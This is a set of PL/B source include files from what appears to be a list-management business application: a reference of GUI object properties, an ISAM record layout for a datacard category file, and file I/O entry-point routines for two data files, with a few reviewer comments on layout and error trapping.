. Also note that if the RIGHT property is turned off, this causes
. the text output to be justified to the left.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. RIGHTBUTTON[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies whether the right mouse button can be
. used to cause an event or not. If the <dnumnvar> value
. is not provided, the RIGHTBUTTON property is turned on.
.
. Objects:
. FLOATMENU
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. SCALE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies a percentage by which a picture object
. is scaled.
.
. Objects:
. PICT
.
. dnumnvar values:
.
. The <dnumnvar> value is percentage value.
.
*------------------------------------------------------------------------------
. SCROLLBAR[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies what type of scrollbars are to be provided
. for a picture or window object. If the <dnumnvar> value
. is not provided, the SCROLLBAR property is set to $SCRBOTH.
.
. Objects:
. PICT
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$SCRBOTH EQU 1 // Both horizontal and vertical scrollbars
$SCRHORZ EQU 2 // Horizontal scrollbar only
$SCRNONE EQU 3 // No scrollbars
$SCRVERT EQU 4 // Vertical scrollbar only
.
*------------------------------------------------------------------------------
. SELLENGTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the number of units to highlight in
. the slider object view when the SELRANGE property is set to ON.
. It is recommended that the SELLENGTH value be defined in the
. range specified by the MAX and MIN property values.
.
. Note1: The highlighted output does not occur when the SELLENGTH
. property value plus the SELSTART value is greater than
. 32767. The highlighted output may not occur if 'nvar'
. value is negative.
.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> value is logical user specified units.
.
*------------------------------------------------------------------------------
. SELRANGE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The property specifies if a highlighted selection is to be
. applied to the slider object. When this PROPERTY is turned
. ON, the slider object uses the SELSTART and SELLENGTH
. values to define the highlighted selection output.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. SELSTART=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the starting logical unit from which
. the slider object begins the highlighted output when the SELRANGE
. property is set to ON.
.
. Note1: The highlighted output does not occur when the SELLENGTH
. property value plus the SELSTART value is greater than
. 32767. The highlighted output may not occur if 'nvar'
. value is negative.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> value is logical user specified unit.
.
*------------------------------------------------------------------------------
. SHAPE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of shape to be output for the
. shape object. If the SHAPE property is invalid, the shape
. object defaults to a rectangle output.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $RECTANGLE
$OVAL EQU 1 // Oval (ellipse) shape
$RECTANGLE EQU 2 // Default - rectangle shape
$RNDRECT EQU 3 // Rounded-corner rectangle
.
*------------------------------------------------------------------------------
. SHIFT=dnumnvar See Objects:
.
. Description:
. This property defines the number of units to move the slider
. thumb when the mouse is clicked in the object slide area.
. This also occurs when the page up or page down keys are entered.
.
. Objects:
. HSCROLLBAR SETPROP GETPROP
. SLIDER CREATE SETPROP GETPROP
. VSCROLLBAR SETPROP GETPROP
.
. dnumnvar values:
.
. The value is a logical unit as specified by the user.
.
*------------------------------------------------------------------------------
. SIZE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the point size for a font object.
.
. Objects:
. FONT
.
. dnumnvar values:
.
. The <dnumnvar> value is a point size for a font.
.
*------------------------------------------------------------------------------
. SORTED[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the items in the datalist object
. are to be sorted. If the <dnumnvar> value is not provided,
. the SORTED property is turned ON.
.
. Note1: When the SORTED property is used, Windows controls the
. sorting method. The Windows method is to sort the
. item name field alphabetically starting with the first
. character. Windows does not support any alternate sorting
. methods.
.
. Objects:
. COMBOBOX
. DATALIST
. POPUPMENU ( OBSELETE )
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. STATIC[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the edittext object is used for
. output only purposes. An edittext object with this property
. cannot get the focus and no cut/copy operations can be performed.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. STYLE=dnumnvar|3DON|3DOFF|3DFLAT|3DOUT CREATE SETPROP GETPROP
.
. Description:
. The STYLE property specifies when an object should
. have a 3D look or a non-3D look. The various forms of STYLE
. defines that an object can have presentations as follows:
.
. 3DOFF - Object does not have a 3D look.
. 3DON - Object has a 3D sunken look.
. 3DFLAT- Object has a 3D flat look.
. 3DOUT - Object has a 3D outward look.
.
. Note1: Some objects are limited to presentations described as
. 3DON or 3DOFF only. For these objects the user should
. use the APPEARANCE property and not the STYLE property.
.
. Objects:
. CHECKBOX (See Note1:)
. CHECKGRP (See Note1:)
. COMBOBOX (See Note1:)
. DATALIST (See Note1:)
. EDITTEXT
. GROUPBOX
. MOVIE
. PICT
. POPUPMENU ( OBSELETE ) (See Note1:)
. PROGRESS
. RADIOGRP (See Note1:)
. RADIO (See Note1:)
. STATTEXT
. WINDOW (See Note1:)
.
. dnumnvar values:
.
$DEFAULT EQU 0 // Default
$3DON EQU 1 // 3D sunken look
$3DOFF EQU 2 // No 3D look
$3DFLAT EQU 3 // 3D flat look
$3DOUT EQU 4 // 3D outward look
.
*------------------------------------------------------------------------------
. SYSMENU=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies whether a window object should output
. a sysmenu or not.
.
. Note1: The SYSMENU property does not have an effect if the
. CAPTION property is set to $OFF for a MODAL or MODELESS
. window type.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. TABFIXHTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the height in pixels for the
. TABCONTROL labels. This property only takes effect when the
. TABWTHSTYLE property is set to FIXED.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
. The <dnumnvar> value is the number of pixels for label height.
.
*------------------------------------------------------------------------------
. TABFIXWTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the width in pixels for the
. TABCONTROL labels. This property only takes effect when the
. TABWTHSTYLE property is set to FIXED.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
. The <dnumnvar> value is the number of pixels for label width.
.
*------------------------------------------------------------------------------
. TABID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the location of this object in the
. tabbing order sequence. If the TABID property is not used, the
. object is assigned an internal tabbing order value which is
. determined by the order that objects are created and an
. initial TABID value specified for the window of the object. If the
. TABID property is specified, then the value of the TABID
. determines the location of the object in the tabbing sequence.
. The tabbing sequence processes from lower TABID valued objects
. to higher TABID valued objects as the TAB key is entered.
.
. Note1: The *NODEFTABID=OFF in the SETMODE statement can be
. used to exclude any object with an internally assigned
. tabid from the tabbing sequence.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. HSCROLLBAR
. POPUPMENU ( OBSOLETE )
. RADIOGRP
. RADIO
. SLIDER
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a user specified value to tabbing order.
.
*------------------------------------------------------------------------------
. TABLABEL=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property provides the data items used to generate the
. TABCONTROL labels. The data provided in the <svarslit> is
. set of items separated by semicolon characters. If the TABLABEL
. is not specified or the <svarslit> is NULL, then the TABCONTROL
. will not have any tab labels.
.
. Objects:
. TABCONTROL
.
. svarslit values:
.
. The <svarslit> is a list of items separated by a semicolon.
.
*------------------------------------------------------------------------------
. TABSTOPS=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property specifies a data string which is composed of tabstop
. location values separated by semicolon characters. See the manual
. for detailed description.
.
. Objects:
. DATALIST
.
. svarslit values:
.
. The <svarslit> data string is tabstop location values separated
. by semicolons.
.
*------------------------------------------------------------------------------
. TABWTHSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the look of the labels. If the $FIXED
. value is used, the TABFIXHTH and TABFIXWTH properties determine
. the height and width of the labels. The $JUST value causes any
. multiple row TABCONTROL to size the labels evenly to fill each row.
.
. Objects:
. TABCONTROL
.
. dnumnvar values:
.
.$NONE EQU 0
$FIXED EQU 1
$JUST EQU 2
$NOJUST EQU 3
.
*------------------------------------------------------------------------------
. TICKFREQ=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the frequency at which tick marks are
. applied to the slider object output. The <dnumnvar> value for
. this property should be in the range of the MIN and MAX values.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
. The <dnumnvar> is a user logical unit value.
.
*------------------------------------------------------------------------------
. TICKSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of look that a slider object
. takes on. This property causes tick unit marks
. to be placed on either side of the slide thumb control;
. on both sides of the slide thumb control; or no tick
. mark output at all. The number of tick units to be applied
. depend on the MAX, MIN, and TICKFREQ property values.
.
. Note1: Values other than those shown for <dnumnvar> result in
. no tick mark output.
.
. Objects:
. SLIDER
.
. dnumnvar values:
.
.$NONE EQU 0
$TICKBOTH EQU 1
$TICKBOTTOM EQU 2
$TICKRIGHT EQU 2
$TICKTOP EQU 4
$TICKLEFT EQU 4
.
*------------------------------------------------------------------------------
. TITLE=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property allows a title to be specified for the supported
. objects.
.
. Objects:
. CHECKGRP
. GROUPBOX
. RADIOGRP
. WINDOW
.
. svarslit values:
.
. The <svarslit> variable is a title string.
.
*------------------------------------------------------------------------------
. TOP=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a SETPROP/GETPROP only property. The property
. is the current top coordinate for an object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. FLOATMENU
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSOLETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used when
. the object was created.
.
*------------------------------------------------------------------------------
. TRISTATE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that a checkbox object is to have the
. capability of a third state or not. When the TRISTATE property
. is turned ON, this allows the checkbox object to be checked
. and grayed as a third state. When the TRISTATE property is turned
. OFF, the checkbox object only has two states where the checkbox
. is either blanked or checked.
.
. Note1: Under program control the SETITEM statement can be used
. to set the current state of the checkbox object.
.
. Objects:
. CHECKBOX
. CHECKGRP
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. UPPERCASE[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. This property specifies that the edittext object is to convert
. all entered data to uppercase. When this property is set to
. be OFF, then this indicates that no data conversion occurs.
.
. Note1: Use of the property should be replaced by using the EDITTYPE
. property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. USEALTKEY=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if the Windows ALT+KEY is to be allowed
. for the stattext object. If the USEALTKEY property is set to ON,
. then using an '&' character in the name of the stattext object
. will allow the ALT+KEY feature to work. If the USEALTKEY property
. is set to OFF, then any '&' character in the name of the
. stattext object is output as part of the name and the ALT+KEY
. feature does not generate any events for the object.
.
. Objects:
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. VISIBLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies if an object is to be made visible or
. invisible. If the VISIBLE property is set to $ON and the current
. state of the object is invisible, then this is the same as if
. an ACTIVATE statement without any activation routine was
. executed for the object. However, if the VISIBLE property is set
. $ON and the object is already visible, then the object remains
. visible and no change occurs. If the VISIBLE property is set to
. $OFF, this is the same as if a DEACTIVATE statement was executed
. for the object. The GETPROP retrieves the current VISIBLE state
. for the object.
.
. Note1: The VISIBLE property is ignored for a WINDOW object when
. the WINTYPE is set for MODAL. This can not be allowed
. since the program execution remains at the ACTIVATE
. statement while the MODAL dialog is processed. If the
. VISIBLE property were allowed, then this would cause
. program execution to remain at the CREATE statement
. causing a program to hang since no events could be
. registered for use.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MOVIE
. PICT
. POPUPMENU
. PROGRESS
. RADIO
. RADIOGRP
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. WIDTH=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The width
. of the object can be retrieved using the GETPROP statement.
. The width is determined by subtracting the left object rectangle
. coordinate from the right object rectangle coordinate. The
. SETPROP statement can be used to change the current width of
. an object.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSOLETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the width expects to use pixels.
.
*------------------------------------------------------------------------------
. WINOFFSETH=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The WINOFFSETH
. property identifies a relative horizontal offset for the
. visible viewing area of a WINDOW. By default the visible
. viewing offset starts with a zero value.
.
. Note1: It is possible to create objects outside the normal
. viewing area for a Window. If this is done, then the
. WINOFFSETH and WINOFFSETV properties can be used to
. bring these objects into the viewing area.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a pixel value which defines a horizontal
. offset for the visible area of a Window.
.
*------------------------------------------------------------------------------
. WINOFFSETV=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The WINOFFSETV
. property identifies a relative vertical offset for the
. visible viewing area of a WINDOW. By default the
. visible viewing offset starts with a zero value.
.
. Note1: It is possible to create objects outside the normal
. viewing area for a Window. If this is done, then the
. WINOFFSETH and WINOFFSETV properties can be used to
. bring these objects into the viewing area.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a pixel value which defines a vertical
. offset for the visible area of a Window.
.
*------------------------------------------------------------------------------
. WINPOS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the positioning of a window when a
. window object is activated.
.
. The allowed window positioning types are as follows:
.
. ABSOLUTE - This causes a window object to be positioned to
. the top/left co-ordinates of the window object.
.
. DESKCENTER - This causes a window object to be centered on the
. desktop.
.
. PARENTCENTER - This centers a MODAL or MODELESS window object over the
. parent window. If the window object is not a MODAL or
. MODELESS window object, it is treated as if DESKCENTER
. was used.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as Default
$ABSOLUTE EQU 1 // Default
$DESKCENTER EQU 2
$PARENTCENTER EQU 3
.
*------------------------------------------------------------------------------
. WINTYPE=dnumnvar CREATE GETPROP
.
. Description:
. This property specifies the type of window applied for the
. window object.
.
. The allowed window types are as follows:
.
. MODAL - This causes a MODAL dialog window to be created.
. When this window is activated using the ACTIVATE
. statement, the program execution remains at the
. ACTIVATE statement until the window is
. destroyed or deactivated. While a MODAL window
. is active, no events other than events for the MODAL
. window are processed until the MODAL window is
. terminated.
.
. MODELESS - This causes a MODELESS dialog window to be created.
. This window is a Window's popup window which will
. always remain on top of any primary window. Another
. feature is that this window acts as a child window
. to a primary window. If the primary window gets
. minimized, then the MODELESS dialog window is also
. minimized. However, the MODELESS dialog window
. does not affect the minimized task bar selections.
. The MODELESS dialog window can not be minimized.
. The MODELESS dialog window does not lock out event
. processing for other windows while the MODELESS
. window is active.
. OBJONLY - The use for the objects only window type is reserved
. for use by the PLB designer. If this type is used
. in a program, then it is implemented as a
. PRIMARYSIZE window type.
.
. PRIMARYFIXED - This type creates a Window's Primary window which
. can not be sized. A primary window can be minimized
. and maximized. A primary window will always be
. presented under a MODAL/MODELESS dialog window.
. If a primary window is active when a MODELESS window
. is created, then the primary window acts as the
. parent window for the MODELESS window.
.
. PRIMARYSIZE - The primary sized window type is a Windows' Primary
. window which can be sized. All other features are
. the same as PRIMARYFIXED.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as Default
$MODAL EQU 1
$MODELESS EQU 2
$OBJONLY EQU 3 // PLFORM use only
$PRIMARYFIXED EQU 4
$PRIMARYSIZE EQU 5 // Default
.
*------------------------------------------------------------------------------
. WORDWRAP[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. For a MULTILINE edittext object this property causes
. the data entry to continue at the beginning of the
. next line when the right most boundary of the edittext
. object is encountered. If the <dnumnvar> value is not
. specified, the WORDWRAP property is set to ON.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. X1=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The X1 property
. specifies the X coordinate for the starting point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the X1 value expects to use pixels.
*------------------------------------------------------------------------------
. X2=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The X2 property
. specifies the X coordinate for the ending point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the X2 value expects to use pixels.
*------------------------------------------------------------------------------
. Y1=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The Y1 property
. specifies the Y coordinate for the starting point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the Y1 value expects to use pixels.
*------------------------------------------------------------------------------
. Y2=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The Y2 property
. specifies the Y coordinate for the ending point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the Y2 value expects to use pixels.
*------------------------------------------------------------------------------
. ZORDER=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies which object should be displayed
. on top when more than one object exists in the same space
. and in the same plane.
.
. Note1: Any objects in 'Plane 1' will always be on top of
. any object in 'Plane 0' with the exception of the
. TABCONTROL object. Although, the TABCONTROL object
. exists in 'Plane 1', the 'Plane 0' objects can be
. placed on top of the TABCONTROL by having a higher
. ZORDER value than the TABCONTROL.
.
. Note2: When the ZORDER value for any object is higher than
. any other object in the same plane, then the object
. with the higher value exists on top.
.
. Note3: The ZORDER exists for a window object only to define
. a default zorder starting value for objects created
. for that window object without an explicit ZORDER.
.
. Objects:
. BUTTON ;Plane 1
. CHECKBOX ;Plane 1
. CHECKGRP ;Plane 1
. COMBOBOX ;Plane 1
. DATALIST ;Plane 1
. EDITTEXT ;Plane 1
. GROUPBOX ;Plane 0
. HSCROLLBAR ;Plane 1
. ICON ;Plane 0
. LINE ;Plane 0
. MREGION ;Plane 0
. MOVIE ;Plane 1
. PICT ;Plane 0
. POPUPMENU ( OBSOLETE ) ;Plane 1
. PROGRESS ;Plane 0
. RADIOGRP ;Plane 1
. RADIO ;Plane 1
. SHAPE ;Plane 0
. SLIDER ;Plane 1
. STATTEXT ;Plane 0
. TABCONTROL ;Plane 1
. VSCROLLBAR ;Plane 1
. WINDOW ;No Plane
.
. dnumnvar values:
.
. The <dnumnvar> value is a user defined value.
.
<file_sep>/include/NMDCCATDD.inc
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: NINMDCCAT
. LENGTH:
. COMPRESS: NONE
. TYPE:
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
......................................................
. File name, file-list handles (primary + secondary ISI),
. open flag (NMDCCFLAG) and key work fields for the MIN
. datacard category file.
NMDCCNAME Init "NINMDCCAT.Isi|NINS1:502"
NMDCCFLIST FileList
NMDCCFILE IFILE Name="NINMDCCAT.Isi|NINS1:502"
NMDCCFILE2 IFILE Name="NINMDCCAT2.Isi|NINS1:502"
 FileListEnd
NMDCCSFILE FILE
NMDCCFLAG FORM 1
NMDCCPATH FORM 1
NMDCCFld Dim 6
NMDCCFld2 Dim 3
.
. Record layout; byte positions follow each field.
. NOTE(review): NMDCCCATDSC is Dim 25 but its stated positions
. 29-49 cover only 21 bytes, and bytes 25-28 are unaccounted
. for -- verify this layout against the physical file.
NMDCCVARS LIST
NMDCCnum Dim 6 1-6 Card# Key
NMDCCSQN Form 2 7-8 Category Seq#
NMDCCCATC Dim 3 9-11 Category COde Key
NMDCCCAT FOrm 5.2 12-19 Category DOllar
NMDCCCATCHR dim 4 20-23 Category option -char
NMDCCCATR Dim 1 24-24 Rate M/L
NMDCCCATDSC Dim 25 29-49 Description
 ListEnd
<file_sep>/include/LSTIIO.inc
..............................................................................
.
. LSTIIO INCLUSION
.
.INcome by List projections data descriptor
.used for List management income reporting to Owners
.
. Pattern shared by every entry point below: BRANCH on LSTIFLAG
. skips the open once LSTIOPEN has set the flag (C1); FILEPI 1
. holds the file for the single I/O statement that follows; the
. IO trap routes I/O errors to IOMSSG and is cleared on the way
. out.
..............................................................................
.
. ENTRY POINT : LSTIKEY
. REQUIRED : 'LSTIFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LSTIKEY BRANCH LSTIFLAG TO LSTI1
        CALL LSTIOPEN
LSTI1   trap IOMSSG GIVING ERROR if IO
        FILEPI 1;LSTIFILE
        READ LSTIFILE,LSTIFLD;LSTIVARS
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTITST
. REQUIRED : LSTIFLD
. DESCRIPTION : TEST KEY
. (record data is read into STR1 and discarded; only the
. resulting flags matter to the caller)
.
LSTITST BRANCH LSTIFLAG TO LSTI2
        CALL LSTIOPEN
LSTI2   trap IOMSSG GIVING ERROR if IO
        FILEPI 1;LSTIFILE
        READ LSTIFILE,LSTIFLD;STR1
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTIKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL FILE READ
.
LSTIKS  BRANCH LSTIFLAG TO LSTI3
        CALL LSTIOPEN
LSTI3   trap IOMSSG GIVING ERROR if IO
        FILEPI 1;LSTIFILE
        READKS LSTIFILE;LSTIVARS
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTISEQ
. REQUIRED :
. DESCRIPTION : SEQUENTIAL FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LSTISEQ
        BRANCH LSTIFLAG TO LSTI4
        CALL LSTIOPEN
LSTI4   trap IOMSSG GIVING ERROR if IO
        FILEPI 1;LSTIFILE
        READ LSTIFILE,SEQ;LSTIVARS
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTIWRT
. REQUIRED : 'LSTIFLD'
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
LSTIWRT Branch LSTIflag to LSTI5
        CALL LSTIOPEN
LSTI5   TRAP IOMSSG GIVING ERROR IF IO
        FILEPI 1;LSTIFILE
        WRITE LSTIFILE,LSTIFLD;LSTIVARS
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTIUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
LSTIUPD BRANCH LSTIFLAG TO LSTI6
        CALL LSTIOPEN
LSTI6   TRAP IOMSSG GIVING ERROR IF IO
        FILEPI 1;LSTIFILE
        UPDATE LSTIFILE;LSTIVARS
        TRAPCLR IO
        RETURN
..............................................................................
.
. ENTRY POINT : LSTIDEL
. REQUIRED : 'LSTIFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
LSTIDEL BRANCH LSTIFLAG TO LSTI7
        CALL LSTIOPEN
LSTI7   TRAP IOMSSG GIVING ERROR IF IO
        FILEPI 1;LSTIFILE
        DELETE LSTIFILE,LSTIFLD
        TRAPCLR IO
        RETURN
...............................................................................
.
. ENTRY POINT : LSTIOPEN
. REQUIRED : 'LSTIFLAG'
. RETURNED : 'LSTIFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
LSTIOPEN
        TRAP LSTIGONE IF IO
.
        OPEN LSTIFILE,LSTINAME
        TRAPCLR IO
        MOVE C1 TO LSTIFLAG
        RETURN
.
. Open failed: report the missing file name and abort via the
. common FILEGONE handler.
LSTIGONE MOVE LSTINAME TO FILENAME
        CALL FILEGONE
.
..............................................................................
<file_sep>/include/MDC035IO.inc
..............................................................................
.******************************************************
.* M035 List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M035 DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M035, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
.
. NOTE(review): unlike LSTIIO, the read/write entry points below
. set no IO trap of their own -- an I/O error will invoke whatever
. trap the caller has active (or abort). Confirm this difference
. is intentional.
...............................................
. ENTRY POINT : M035KEY
. REQUIRED : 'M035Fld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M035KEY BRANCH M035Flag TO M0351
        CALL M035Open
M0351   FILEPI 1;M035File
        READ M035File,M035Fld;M035Vars
        RETURN
..............................................................................
.
. ENTRY POINT : M035TST
. REQUIRED : M035Fld
. RETURNED :
. DESCRIPTION : TEST KEY
. (record data is read into STR1 and discarded)
.
M035TST BRANCH M035Flag TO M0352
        CALL M035Open
M0352   FILEPI 1;M035File
        READ M035File,M035Fld;STR1
        RETURN
..............................................................................
.
. ENTRY POINT : M035KS
. REQUIRED :
. RETURNED : M035 Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
M035KS  BRANCH M035Flag TO M0353
        CALL M035Open
M0353   FILEPI 1;M035File
        READKS M035File;M035Vars
        RETURN
..............................................................................
. ENTRY POINT : M035SEQ
. REQUIRED :
. RETURNED : M035 Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M035SEQ BRANCH M035Flag TO M0354
        CALL M035Open
M0354   FILEPI 1;M035File
        READ M035File,SEQ;M035Vars
        RETURN
..............................................................................
.
. ENTRY POINT : M035WRT
. REQUIRED : 'M035Fld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
. (write goes through the file list so the ISI index
. stays in step with the text file)
.
M035WRT BRANCH M035Flag TO M0355
        CALL M035Open
M0355   FILEPI 1;M035Flist
        WRITE M035FLIST;M035Vars
        RETURN
..............................................................................
.
. ENTRY POINT : M035UPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
M035UPD BRANCH M035Flag TO M0356
        CALL M035Open
M0356
        FILEPI 1;M035FList
        UPDATE M035FList;M035Vars
        RETURN
..............................................................................
.
. ENTRY POINT : M035DEL
. REQUIRED : 'M035Fld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
M035DEL BRANCH M035Flag TO M0357
        CALL M035Open
M0357   FILEPI 1;M035FList
        DELETE M035FList
        RETURN
..............................................................................
.
. ENTRY POINT : M035Open
. REQUIRED : 'M035Flag' 'M035PATH'
. RETURNED : 'M035Flag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
M035Open TRAP M035GONE giving error IF IO
        OPEN M035FList
        TRAPCLR IO
        MOVE C1 TO M035Flag
        RETURN
..............................................................................
. Open failed: report the missing file name and abort via FILEGONE.
M035GONE MOVE M035NAME TO FILENAME
        CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/ndatBdd.inc
******************************************************
